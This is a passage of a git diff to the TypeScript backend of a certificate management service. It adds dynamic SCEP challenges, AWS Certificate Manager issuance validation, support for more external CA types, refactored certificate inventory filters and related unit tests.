caId: string | null | undefined, + enrollmentType: EnrollmentType, + externalCertificateAuthorityDAL: Pick +) => { + if (!caId) return; + const externalCa = await externalCertificateAuthorityDAL.findOne({ caId }); + if (externalCa?.type === CaType.AWS_ACM_PUBLIC_CA && enrollmentType !== EnrollmentType.API) { + throw new ForbiddenRequestError({ + message: "AWS Certificate Manager only supports API enrollment" + }); + } +}; + const validateExternalConfigs = async ( externalConfigs: Record | null | undefined, caId: string | null, @@ -241,6 +257,7 @@ type TCertificateProfileServiceFactoryDep = { estEnrollmentConfigDAL: TEstEnrollmentConfigDALFactory; acmeEnrollmentConfigDAL: TAcmeEnrollmentConfigDALFactory; scepEnrollmentConfigDAL: TScepEnrollmentConfigDALFactory; + scepDynamicChallengeDAL: Pick; certificateBodyDAL: Pick; certificateSecretDAL: Pick; certificateAuthorityDAL: Pick; @@ -284,6 +301,7 @@ export const certificateProfileServiceFactory = ({ estEnrollmentConfigDAL, acmeEnrollmentConfigDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, certificateBodyDAL, certificateSecretDAL, certificateAuthorityDAL, @@ -323,11 +341,6 @@ export const certificateProfileServiceFactory = ({ }) ); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - // Validate that certificate policy exists and belongs to the same project if (data.certificatePolicyId) { const policy = await certificatePolicyDAL.findById(data.certificatePolicyId); @@ -351,6 +364,8 @@ export const certificateProfileServiceFactory = ({ validateIssuerTypeConstraints(data.issuerType, data.enrollmentType, data.caId ?? null); + await validateAcmEnrollmentType(data.caId, data.enrollmentType, externalCertificateAuthorityDAL); + // Validate defaults against policy constraints if (data.defaults && data.certificatePolicyId) { const policy = await certificatePolicyDAL.findById(data.certificatePolicyId); @@ -414,9 +429,12 @@ export const certificateProfileServiceFactory = ({ encryptedRaPrivateKey: Buffer; raCertificatePem: string; raCertExpiresAt: Date; - hashedChallengePassword: string; + hashedChallengePassword: string | null; + challengeType: string; includeCaCertInResponse: boolean; allowCertBasedRenewal: boolean; + dynamicChallengeExpiryMinutes: number | null; + dynamicChallengeMaxPending: number | null; } | undefined; @@ -433,18 +451,28 @@ export const certificateProfileServiceFactory = ({ plainText: Buffer.from(raCert.privateKeyDer) }); - const appCfg = getConfig(); - const hashedChallengePassword = await crypto - .hashing() - .createHash(data.scepConfig.challengePassword, appCfg.SALT_ROUNDS); + const challengeType = (data.scepConfig.challengeType as ScepChallengeType) || ScepChallengeType.STATIC; + let hashedChallengePassword: string | null = null; + + if (challengeType === ScepChallengeType.STATIC && data.scepConfig.challengePassword) { + const appCfg = getConfig(); + hashedChallengePassword = await crypto + .hashing() + .createHash(data.scepConfig.challengePassword, appCfg.SALT_ROUNDS); + } precomputedScepConfig = { encryptedRaPrivateKey, raCertificatePem: raCert.certificatePem, raCertExpiresAt: raCert.expiresAt, hashedChallengePassword, + challengeType, includeCaCertInResponse: data.scepConfig.includeCaCertInResponse ?? true, - allowCertBasedRenewal: data.scepConfig.allowCertBasedRenewal ?? true + allowCertBasedRenewal: data.scepConfig.allowCertBasedRenewal ?? true, + dynamicChallengeExpiryMinutes: + challengeType === ScepChallengeType.DYNAMIC ? (data.scepConfig.dynamicChallengeExpiryMinutes ?? 60) : null, + dynamicChallengeMaxPending: + challengeType === ScepChallengeType.DYNAMIC ? (data.scepConfig.dynamicChallengeMaxPending ?? 100) : null }; } @@ -507,8 +535,11 @@ export const certificateProfileServiceFactory = ({ raCertificate: precomputedScepConfig.raCertificatePem, raCertExpiresAt: precomputedScepConfig.raCertExpiresAt, hashedChallengePassword: precomputedScepConfig.hashedChallengePassword, + challengeType: precomputedScepConfig.challengeType, includeCaCertInResponse: precomputedScepConfig.includeCaCertInResponse, - allowCertBasedRenewal: precomputedScepConfig.allowCertBasedRenewal + allowCertBasedRenewal: precomputedScepConfig.allowCertBasedRenewal, + dynamicChallengeExpiryMinutes: precomputedScepConfig.dynamicChallengeExpiryMinutes, + dynamicChallengeMaxPending: precomputedScepConfig.dynamicChallengeMaxPending }, tx ); @@ -601,6 +632,8 @@ export const certificateProfileServiceFactory = ({ validateIssuerTypeConstraints(finalIssuerType, finalEnrollmentType, finalCaId ?? null, existingProfile.caId); + await validateAcmEnrollmentType(finalCaId, finalEnrollmentType, externalCertificateAuthorityDAL); + // Validate external configs only if they are provided in the update if (data.externalConfigs !== undefined) { await validateExternalConfigs( @@ -710,13 +743,38 @@ export const certificateProfileServiceFactory = ({ } if (scepConfig && existingProfile.scepConfigId) { + const existingScepConfig = await scepEnrollmentConfigDAL.findById(existingProfile.scepConfigId, tx); + const scepUpdateData: { - hashedChallengePassword?: string; + hashedChallengePassword?: string | null; + challengeType?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number | null; + dynamicChallengeMaxPending?: number | null; } = {}; - if (scepConfig.challengePassword) { + if (scepConfig.challengeType !== undefined) { + scepUpdateData.challengeType = scepConfig.challengeType; + if (scepConfig.challengeType === ScepChallengeType.DYNAMIC) { + scepUpdateData.hashedChallengePassword = null; + scepUpdateData.dynamicChallengeExpiryMinutes = scepConfig.dynamicChallengeExpiryMinutes ?? 60; + scepUpdateData.dynamicChallengeMaxPending = scepConfig.dynamicChallengeMaxPending ?? 100; + } + if (scepConfig.challengeType === ScepChallengeType.STATIC) { + // Require password when switching from dynamic to static + const isSwitchingFromDynamic = existingScepConfig?.challengeType === ScepChallengeType.DYNAMIC; + if (isSwitchingFromDynamic && !scepConfig.challengePassword) { + throw new BadRequestError({ + message: "Switching to static challenge type requires providing a challenge password" + }); + } + await scepDynamicChallengeDAL.deleteByConfigId(existingProfile.scepConfigId, tx); + scepUpdateData.dynamicChallengeExpiryMinutes = null; + scepUpdateData.dynamicChallengeMaxPending = null; + } + } + if (scepConfig.challengePassword && scepUpdateData.challengeType !== ScepChallengeType.DYNAMIC) { scepUpdateData.hashedChallengePassword = await crypto .hashing() .createHash(scepConfig.challengePassword, getConfig().SALT_ROUNDS); @@ -727,6 +785,12 @@ export const certificateProfileServiceFactory = ({ if (scepConfig.allowCertBasedRenewal !== undefined) { scepUpdateData.allowCertBasedRenewal = scepConfig.allowCertBasedRenewal; } + if (scepUpdateData.challengeType === undefined && scepConfig.dynamicChallengeExpiryMinutes !== undefined) { + scepUpdateData.dynamicChallengeExpiryMinutes = scepConfig.dynamicChallengeExpiryMinutes; + } + if (scepUpdateData.challengeType === undefined && scepConfig.dynamicChallengeMaxPending !== undefined) { + scepUpdateData.dynamicChallengeMaxPending = scepConfig.dynamicChallengeMaxPending; + } if (Object.keys(scepUpdateData).length > 0) { await scepEnrollmentConfigDAL.updateById(existingProfile.scepConfigId, scepUpdateData, tx); } @@ -839,6 +903,12 @@ export const certificateProfileServiceFactory = ({ const appCfg = getConfig(); const siteUrl = appCfg.SITE_URL ?? ""; profile.scepConfig.scepEndpointUrl = `${siteUrl}/scep/${profile.id}/pkiclient.exe`; + if (profile.scepConfig.challengeType === ScepChallengeType.DYNAMIC) { + profile.scepConfig.challengeEndpointUrl = `${siteUrl}/scep/${profile.id}/challenge`; + } else { + delete profile.scepConfig.dynamicChallengeExpiryMinutes; + delete profile.scepConfig.dynamicChallengeMaxPending; + } } // Parse externalConfigs from JSON string to object if it exists @@ -1017,7 +1087,16 @@ export const certificateProfileServiceFactory = ({ ? { ...profileWithConfigs.acmeConfig, directoryUrl: buildUrl(profile.id, "/directory") } : undefined, scepConfig: profileWithConfigs.scepConfig - ? { ...profileWithConfigs.scepConfig, scepEndpointUrl: `${siteUrl}/scep/${profile.id}/pkiclient.exe` } + ? { + ...profileWithConfigs.scepConfig, + scepEndpointUrl: `${siteUrl}/scep/${profile.id}/pkiclient.exe`, + ...(profileWithConfigs.scepConfig.challengeType === ScepChallengeType.DYNAMIC + ? { challengeEndpointUrl: `${siteUrl}/scep/${profile.id}/challenge` } + : { + dynamicChallengeExpiryMinutes: undefined, + dynamicChallengeMaxPending: undefined + }) + } : undefined }; diff --git a/backend/src/services/certificate-profile/certificate-profile-types.ts b/backend/src/services/certificate-profile/certificate-profile-types.ts index 5d38505e466..213750fc0fb 100644 --- a/backend/src/services/certificate-profile/certificate-profile-types.ts +++ b/backend/src/services/certificate-profile/certificate-profile-types.ts @@ -80,9 +80,12 @@ export type TCertificateProfileUpdate = Omit< skipEabBinding?: boolean; }; scepConfig?: { + challengeType?: string; challengePassword?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; }; }; @@ -130,6 +133,10 @@ export type TCertificateProfileWithConfigs = TCertificateProfile & { raCertExpiresAt: Date; includeCaCertInResponse: boolean; allowCertBasedRenewal: boolean; + challengeType: string; + challengeEndpointUrl?: string; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; }; }; diff --git a/backend/src/services/certificate-request/certificate-request-dal.ts b/backend/src/services/certificate-request/certificate-request-dal.ts index 2ed557a39ba..6694e123114 100644 --- a/backend/src/services/certificate-request/certificate-request-dal.ts +++ b/backend/src/services/certificate-request/certificate-request-dal.ts @@ -9,6 +9,7 @@ import { applyProcessedPermissionRulesToQuery, type ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { CaStatus } from "@app/services/certificate-authority/certificate-authority-enums"; import { applyMetadataFilter } from "@app/services/resource-metadata/resource-metadata-fns"; import { CertificateRequestStatus } from "./certificate-request-types"; @@ -393,10 +394,44 @@ export const certificateRequestDALFactory = (db: TDbClient) => { } }; + const findPendingValidationByCaType = async ( + caType: string, + options: { limit?: number; afterCreatedAt?: Date } = {} + ): Promise => { + try { + const query = db(TableName.CertificateRequests) + .join( + TableName.CertificateAuthority, + `${TableName.CertificateRequests}.caId`, + `${TableName.CertificateAuthority}.id` + ) + .join( + TableName.ExternalCertificateAuthority, + `${TableName.CertificateAuthority}.id`, + `${TableName.ExternalCertificateAuthority}.caId` + ) + .where(`${TableName.CertificateRequests}.status`, CertificateRequestStatus.PENDING_VALIDATION) + .where(`${TableName.ExternalCertificateAuthority}.type`, caType) + .where(`${TableName.CertificateAuthority}.status`, CaStatus.ACTIVE) + .select(selectAllTableCols(TableName.CertificateRequests)) + .orderBy(`${TableName.CertificateRequests}.createdAt`, "asc"); + + if (options.afterCreatedAt) { + void query.where(`${TableName.CertificateRequests}.createdAt`, ">", options.afterCreatedAt); + } + if (options.limit) void query.limit(options.limit); + + return (await query) as TCertificateRequests[]; + } catch (error) { + throw new DatabaseError({ error, name: "Find pending validation certificate requests by CA type" }); + } + }; + return { ...certificateRequestOrm, findByIdWithCertificate, findPendingByProjectId, + findPendingValidationByCaType, updateStatus, attachCertificate, findByProjectId, diff --git a/backend/src/services/certificate-request/certificate-request-service.test.ts b/backend/src/services/certificate-request/certificate-request-service.test.ts index 37a922475e5..96c19af49ea 100644 --- a/backend/src/services/certificate-request/certificate-request-service.test.ts +++ b/backend/src/services/certificate-request/certificate-request-service.test.ts @@ -57,7 +57,7 @@ describe("CertificateRequestService", () => { certificateDAL: mockCertificateDAL, certificateService: mockCertificateService, permissionService: mockPermissionService, - resourceMetadataDAL: { find: vi.fn().mockResolvedValue([]) } + resourceMetadataDAL: { find: vi.fn().mockResolvedValue([]), insertMany: vi.fn() } }); }); diff --git a/backend/src/services/certificate-request/certificate-request-service.ts b/backend/src/services/certificate-request/certificate-request-service.ts index cbf12187af0..7b8c892dd83 100644 --- a/backend/src/services/certificate-request/certificate-request-service.ts +++ b/backend/src/services/certificate-request/certificate-request-service.ts @@ -32,7 +32,7 @@ type TCertificateRequestServiceFactoryDep = { certificateDAL: Pick; certificateService: Pick; permissionService: Pick; - resourceMetadataDAL: Pick; + resourceMetadataDAL: Pick; }; export type TCertificateRequestServiceFactory = ReturnType; @@ -433,10 +433,12 @@ export const certificateRequestServiceFactory = ({ certificateRequestDAL.countByProjectId(projectId, options, processedRules) ]); - const mappedCertificateRequests = certificateRequests.map((request) => ({ - ...request, - status: request.status as CertificateRequestStatus - })); + const mappedCertificateRequests = certificateRequests.map( + ({ encryptedPrivateKey: _encryptedPrivateKey, ...request }) => ({ + ...request, + status: request.status as CertificateRequestStatus + }) + ); return { certificateRequests: mappedCertificateRequests, diff --git a/backend/src/services/certificate-v3/certificate-approval-fns.ts b/backend/src/services/certificate-v3/certificate-approval-fns.ts index ef1139dc526..36f07812fab 100644 --- a/backend/src/services/certificate-v3/certificate-approval-fns.ts +++ b/backend/src/services/certificate-v3/certificate-approval-fns.ts @@ -14,6 +14,7 @@ import { TCertificateBodyDALFactory } from "@app/services/certificate/certificat import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; import { CertKeyAlgorithm, CertSignatureAlgorithm, CertStatus } from "@app/services/certificate/certificate-types"; +import { validateAcmIssuanceInputs } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; import { TCertificateIssuanceQueueFactory } from "@app/services/certificate-authority/certificate-issuance-queue"; @@ -438,16 +439,39 @@ export const certificateApprovalServiceFactory = ( const caType = (targetCa.externalCa?.type as CaType) ?? CaType.INTERNAL; - if (caType !== CaType.ACME && caType !== CaType.AZURE_AD_CS && caType !== CaType.AWS_PCA) { + if ( + caType !== CaType.ACME && + caType !== CaType.AZURE_AD_CS && + caType !== CaType.AWS_PCA && + caType !== CaType.AWS_ACM_PUBLIC_CA && + caType !== CaType.VENAFI_TPP + ) { return null; } + // Pre-flight validation for ACM β€” fail the approval synchronously rather than + // letting the job produce a FAILED request row after the approver already accepted. + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certRequest.csr || undefined, + keyAlgorithm: certRequest.keyAlgorithm || undefined, + altNames: altNames ?? undefined, + ttl, + organization: certRequest.organization || undefined, + organizationalUnit: certRequest.organizationalUnit || undefined, + country: certRequest.country || undefined, + state: certRequest.state || undefined, + locality: certRequest.locality || undefined + }); + } + const orderId = randomUUID(); await certificateIssuanceQueue.queueCertificateIssuance({ certificateId: orderId, profileId: profile.id, caId: profile.caId || "", + caType, ttl: ttl || "1y", signatureAlgorithm: certRequest.signatureAlgorithm || "", keyAlgorithm: certRequest.keyAlgorithm || "", diff --git a/backend/src/services/certificate-v3/certificate-v3-service.test.ts b/backend/src/services/certificate-v3/certificate-v3-service.test.ts index 9762672b13a..8f9bcec0dda 100644 --- a/backend/src/services/certificate-v3/certificate-v3-service.test.ts +++ b/backend/src/services/certificate-v3/certificate-v3-service.test.ts @@ -2251,6 +2251,51 @@ describe("CertificateV3Service", () => { ).rejects.toThrow("Certificate is not eligible for auto-renewal: certificate has already been renewed"); }); + it("should reject update with accurate enrollment type when profile is ACME", async () => { + const mockCert = { + id: "cert-123", + profileId: "profile-123", + renewedByCertificateId: null, + notBefore: new Date(), + notAfter: new Date(Date.now() + 1000 * 60 * 60 * 24 * 30), + projectId: "project-123", + status: CertStatus.ACTIVE, + revokedAt: null + }; + + const mockProfile = { + id: "profile-123", + enrollmentType: EnrollmentType.ACME, + issuerType: IssuerType.CA, + projectId: "project-123" + }; + + vi.mocked(mockCertificateDAL.findById).mockResolvedValue(mockCert as any); + vi.mocked(mockCertificateProfileDAL.findByIdWithConfigs).mockResolvedValue(mockProfile as any); + + await expect( + service.updateRenewalConfig({ + actor: ActorType.USER, + actorId: "user-123", + actorAuthMethod: AuthMethod.EMAIL, + actorOrgId: "org-123", + certificateId: "cert-123", + renewBeforeDays: 7 + }) + ).rejects.toThrow(ForbiddenRequestError); + + await expect( + service.updateRenewalConfig({ + actor: ActorType.USER, + actorId: "user-123", + actorAuthMethod: AuthMethod.EMAIL, + actorOrgId: "org-123", + certificateId: "cert-123", + renewBeforeDays: 7 + }) + ).rejects.toThrow("Certificate is not eligible for auto-renewal: ACME certificates cannot be auto-renewed"); + }); + it("should reject update if renewBeforeDays >= certificate TTL", async () => { const mockCert = { id: "cert-123", diff --git a/backend/src/services/certificate-v3/certificate-v3-service.ts b/backend/src/services/certificate-v3/certificate-v3-service.ts index 81e2731891c..773ccdf6156 100644 --- a/backend/src/services/certificate-v3/certificate-v3-service.ts +++ b/backend/src/services/certificate-v3/certificate-v3-service.ts @@ -34,6 +34,7 @@ import { CertSignatureAlgorithm, CertStatus } from "@app/services/certificate/certificate-types"; +import { validateAcmIssuanceInputs } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { TCertificateAuthorityDALFactory, TCertificateAuthorityWithAssociatedCa @@ -276,7 +277,13 @@ const validateRenewalEligibility = ( const caType = (ca.externalCa?.type as CaType) ?? CaType.INTERNAL; const isInternalCa = caType === CaType.INTERNAL; - const isConnectedExternalCa = caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA; + const isConnectedExternalCa = + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.DIGICERT || + caType === CaType.VENAFI_TPP; const isImportedCertificate = certificate.pkiSubscriberId != null && !certificate.profileId; if (!isInternalCa && !isConnectedExternalCa) { @@ -1709,6 +1716,28 @@ export const certificateV3ServiceFactory = ({ }); } + // ACM pre-flight validation runs before the approval branch so bad inputs (e.g., a TTL that + // isn't ACM's fixed 198 days) are rejected at submit time rather than after the approver has + // already approved a request that's guaranteed to fail downstream. + if (profile.caId) { + const preflightCa = await certificateAuthorityDAL.findByIdWithAssociatedCa(profile.caId); + if (preflightCa?.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certificateOrder.csr, + keyAlgorithm: certificateOrder.keyAlgorithm, + altNames: certificateOrder.altNames, + ttl: certificateOrder.validity?.ttl, + notBefore: certificateOrder.notBefore, + notAfter: certificateOrder.notAfter, + organization: certificateRequest.organization, + organizationalUnit: certificateRequest.organizationalUnit, + country: certificateRequest.country, + state: certificateRequest.state, + locality: certificateRequest.locality + }); + } + } + const orderApprovalFactory = APPROVAL_POLICY_FACTORY_MAP[ApprovalPolicyType.CertRequest]( ApprovalPolicyType.CertRequest ); @@ -1853,7 +1882,32 @@ export const certificateV3ServiceFactory = ({ }); } - if (caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA) { + if ( + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.DIGICERT || + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.VENAFI_TPP + ) { + // Pre-flight validation for ACM β€” reject bad inputs synchronously so the user + // gets a 400 on submit rather than a FAILED request row after the job runs. + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certificateOrder.csr, + keyAlgorithm: certificateOrder.keyAlgorithm, + altNames: certificateOrder.altNames, + ttl: certificateOrder.validity?.ttl, + notBefore: certificateOrder.notBefore, + notAfter: certificateOrder.notAfter, + organization: certificateRequest.organization, + organizationalUnit: certificateRequest.organizationalUnit, + country: certificateRequest.country, + state: certificateRequest.state, + locality: certificateRequest.locality + }); + } + const orderId = randomUUID(); const certRequest = await certificateRequestService.createCertificateRequest({ @@ -1895,6 +1949,7 @@ export const certificateV3ServiceFactory = ({ certificateId: orderId, profileId: profile.id, caId: profile.caId || "", + caType, ttl: certificateOrder.validity?.ttl || "1y", signatureAlgorithm: certificateOrder.signatureAlgorithm || "", keyAlgorithm: certificateRequest.keyAlgorithm || "", @@ -2181,7 +2236,14 @@ export const certificateV3ServiceFactory = ({ throw new NotFoundError({ message: "Certificate was signed but could not be found in database" }); } newCert = foundCert; - } else if (caType === CaType.ACME || caType === CaType.AZURE_AD_CS || caType === CaType.AWS_PCA) { + } else if ( + caType === CaType.ACME || + caType === CaType.AZURE_AD_CS || + caType === CaType.AWS_PCA || + caType === CaType.DIGICERT || + caType === CaType.AWS_ACM_PUBLIC_CA || + caType === CaType.VENAFI_TPP + ) { // External CA renewal - mark for async processing outside transaction return { isExternalCA: true, @@ -2361,6 +2423,7 @@ export const certificateV3ServiceFactory = ({ certificateId: renewalOrderId, profileId: profile?.id || "", caId: ca.id, + caType: (ca.externalCa?.type as CaType) ?? CaType.INTERNAL, commonName: originalCert.commonName || "", altNames: structuredAltNames, ttl, @@ -2480,7 +2543,7 @@ export const certificateV3ServiceFactory = ({ if (profile.enrollmentType !== EnrollmentType.API) { throw new ForbiddenRequestError({ - message: "Certificate is not eligible for auto-renewal: EST certificates cannot be auto-renewed" + message: `Certificate is not eligible for auto-renewal: ${profile.enrollmentType.toUpperCase()} certificates cannot be auto-renewed` }); } @@ -2597,7 +2660,7 @@ export const certificateV3ServiceFactory = ({ if (profile.enrollmentType !== EnrollmentType.API) { throw new ForbiddenRequestError({ - message: "Certificate is not eligible for auto-renewal: EST certificates cannot be auto-renewed" + message: `Certificate is not eligible for auto-renewal: ${profile.enrollmentType.toUpperCase()} certificates cannot be auto-renewed` }); } diff --git a/backend/src/services/certificate/certificate-dal.ts b/backend/src/services/certificate/certificate-dal.ts index 7e0c2a35282..207ff832e1e 100644 --- a/backend/src/services/certificate/certificate-dal.ts +++ b/backend/src/services/certificate/certificate-dal.ts @@ -12,7 +12,24 @@ import { import { isUuidV4 } from "@app/lib/validator"; import { applyMetadataFilter } from "@app/services/resource-metadata/resource-metadata-fns"; -import { CertStatus } from "./certificate-types"; +import { keySizeToAlgorithms } from "./certificate-fns"; +import { CertKeyAlgorithm, CertStatus } from "./certificate-types"; + +// Scoped to UI-surfaced algorithms; intentionally narrower than pqc-utils.PQC_ALGORITHMS. +export const PQC_KEY_ALGORITHMS: string[] = [ + CertKeyAlgorithm.ML_DSA_44, + CertKeyAlgorithm.ML_DSA_65, + CertKeyAlgorithm.ML_DSA_87 +]; + +export const NON_PQC_KEY_ALGORITHMS: string[] = [ + CertKeyAlgorithm.RSA_2048, + CertKeyAlgorithm.RSA_3072, + CertKeyAlgorithm.RSA_4096, + CertKeyAlgorithm.ECDSA_P256, + CertKeyAlgorithm.ECDSA_P384, + CertKeyAlgorithm.ECDSA_P521 +]; export type TCertificateDALFactory = ReturnType; @@ -48,19 +65,7 @@ export const certificateDALFactory = (db: TDbClient) => { } }; - const countCertificatesInProject = async ({ - projectId, - friendlyName, - commonName, - search, - status, - profileIds, - fromDate, - toDate, - metadataFilter, - extendedKeyUsage - }: { - projectId: string; + type TInventoryFilterParams = { friendlyName?: string; commonName?: string; search?: string; @@ -70,91 +75,189 @@ export const certificateDALFactory = (db: TDbClient) => { toDate?: Date; metadataFilter?: Array<{ key: string; value?: string }>; extendedKeyUsage?: string; - }) => { - try { - interface CountResult { - count: string; - } + keyAlgorithm?: string | string[]; + signatureAlgorithm?: string; + keySizes?: number[]; + caIds?: string[]; + enrollmentTypes?: string[]; + source?: string | string[]; + notAfterFrom?: Date; + notAfterTo?: Date; + notBeforeFrom?: Date; + notBeforeTo?: Date; + }; - let query = db - .replicaNode()(TableName.Certificate) - .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) - .join(TableName.Project, `${TableName.CertificateAuthority}.projectId`, `${TableName.Project}.id`) - .where(`${TableName.Project}.id`, projectId); + const applyInventoryFilters = ( + query: Knex.QueryBuilder, + filters: TInventoryFilterParams, + hasProfileJoin: boolean + ): Knex.QueryBuilder => { + let q = query; - if (friendlyName) { - const sanitizedValue = sanitizeSqlLikeString(friendlyName); - query = query.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - } + if (filters.friendlyName) { + const sanitizedValue = sanitizeSqlLikeString(filters.friendlyName); + q = q.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); + } - if (commonName) { - const sanitizedValue = sanitizeSqlLikeString(commonName); - query = query.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); - } + if (filters.commonName) { + const sanitizedValue = sanitizeSqlLikeString(filters.commonName); + q = q.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); + } + + if (filters.search) { + const sanitizedValue = sanitizeSqlLikeString(filters.search); + q = q.andWhere((qb: Knex.QueryBuilder) => { + void qb + .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) + .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); + + if (isUuidV4(sanitizedValue)) { + void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); + } + }); + } - if (search) { - const sanitizedValue = sanitizeSqlLikeString(search); - query = query.andWhere((qb) => { - void qb - .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - - if (isUuidV4(sanitizedValue)) { - void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); + if (filters.status) { + const now = new Date(); + const statuses = Array.isArray(filters.status) ? filters.status : [filters.status]; + + q = q.andWhere((qb: Knex.QueryBuilder) => { + statuses.forEach((statusValue, index) => { + const whereMethod = index === 0 ? "where" : "orWhere"; + + if (statusValue === CertStatus.ACTIVE) { + void qb[whereMethod]((innerQb: Knex.QueryBuilder) => { + void innerQb + .where(`${TableName.Certificate}.notAfter`, ">", now) + .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); + }); + } else if (statusValue === CertStatus.EXPIRED) { + void qb[whereMethod]((innerQb: Knex.QueryBuilder) => { + void innerQb + .where(`${TableName.Certificate}.notAfter`, "<=", now) + .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); + }); + } else { + void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); } }); - } + }); + } - if (status) { - const now = new Date(); - const statuses = Array.isArray(status) ? status : [status]; - - query = query.andWhere((qb) => { - statuses.forEach((statusValue, index) => { - const whereMethod = index === 0 ? "where" : "orWhere"; - - if (statusValue === CertStatus.ACTIVE) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, ">", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else if (statusValue === CertStatus.EXPIRED) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, "<=", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else { - void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); - } - }); - }); - } + if (filters.fromDate) { + q = q.andWhere(`${TableName.Certificate}.createdAt`, ">=", filters.fromDate); + } - if (fromDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, ">=", fromDate); - } + if (filters.toDate) { + q = q.andWhere(`${TableName.Certificate}.createdAt`, "<=", filters.toDate); + } + + if (filters.profileIds) { + q = q.whereIn(`${TableName.Certificate}.profileId`, filters.profileIds); + } + + if (filters.metadataFilter && filters.metadataFilter.length > 0) { + q = applyMetadataFilter(q, filters.metadataFilter, "certificateId", TableName.Certificate); + } + + if (filters.extendedKeyUsage) { + q = q.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [filters.extendedKeyUsage]); + } - if (toDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, "<=", toDate); + if (filters.keyAlgorithm) { + if (Array.isArray(filters.keyAlgorithm)) { + q = q.whereIn(`${TableName.Certificate}.keyAlgorithm`, filters.keyAlgorithm); + } else { + q = q.andWhere(`${TableName.Certificate}.keyAlgorithm`, filters.keyAlgorithm); } + } + + if (filters.signatureAlgorithm) { + q = q.andWhere(`${TableName.Certificate}.signatureAlgorithm`, filters.signatureAlgorithm); + } + + if (filters.keySizes && filters.keySizes.length > 0) { + const allAlgorithms = filters.keySizes.flatMap((size) => keySizeToAlgorithms(size)); + q = q.whereIn(`${TableName.Certificate}.keyAlgorithm`, allAlgorithms); + } + + if (filters.caIds) { + q = q.whereIn(`${TableName.Certificate}.caId`, filters.caIds); + } + + if (filters.enrollmentTypes && hasProfileJoin) { + q = q.whereIn(`${TableName.PkiCertificateProfile}.enrollmentType`, filters.enrollmentTypes); + } + + if (filters.source) { + const sources = Array.isArray(filters.source) ? filters.source : [filters.source]; + const includesIssued = sources.includes("issued"); + const otherSources = sources.filter((s) => s !== "issued"); - if (profileIds) { - query = query.whereIn(`${TableName.Certificate}.profileId`, profileIds); + q = q.andWhere((qb: Knex.QueryBuilder) => { + if (otherSources.length > 0) { + void qb.whereIn(`${TableName.Certificate}.source`, otherSources); + } + if (includesIssued) { + void qb.orWhere(`${TableName.Certificate}.source`, "issued").orWhereNull(`${TableName.Certificate}.source`); + } + }); + } + + if (filters.notAfterFrom) { + q = q.andWhere(`${TableName.Certificate}.notAfter`, ">=", filters.notAfterFrom); + } + + if (filters.notAfterTo) { + q = q.andWhere(`${TableName.Certificate}.notAfter`, "<=", filters.notAfterTo); + } + + if (filters.notBeforeFrom) { + q = q.andWhere(`${TableName.Certificate}.notBefore`, ">=", filters.notBeforeFrom); + } + + if (filters.notBeforeTo) { + q = q.andWhere(`${TableName.Certificate}.notBefore`, "<=", filters.notBeforeTo); + } + + return q; + }; + + const countCertificatesInProject = async ( + { + projectId, + ...filters + }: { + projectId: 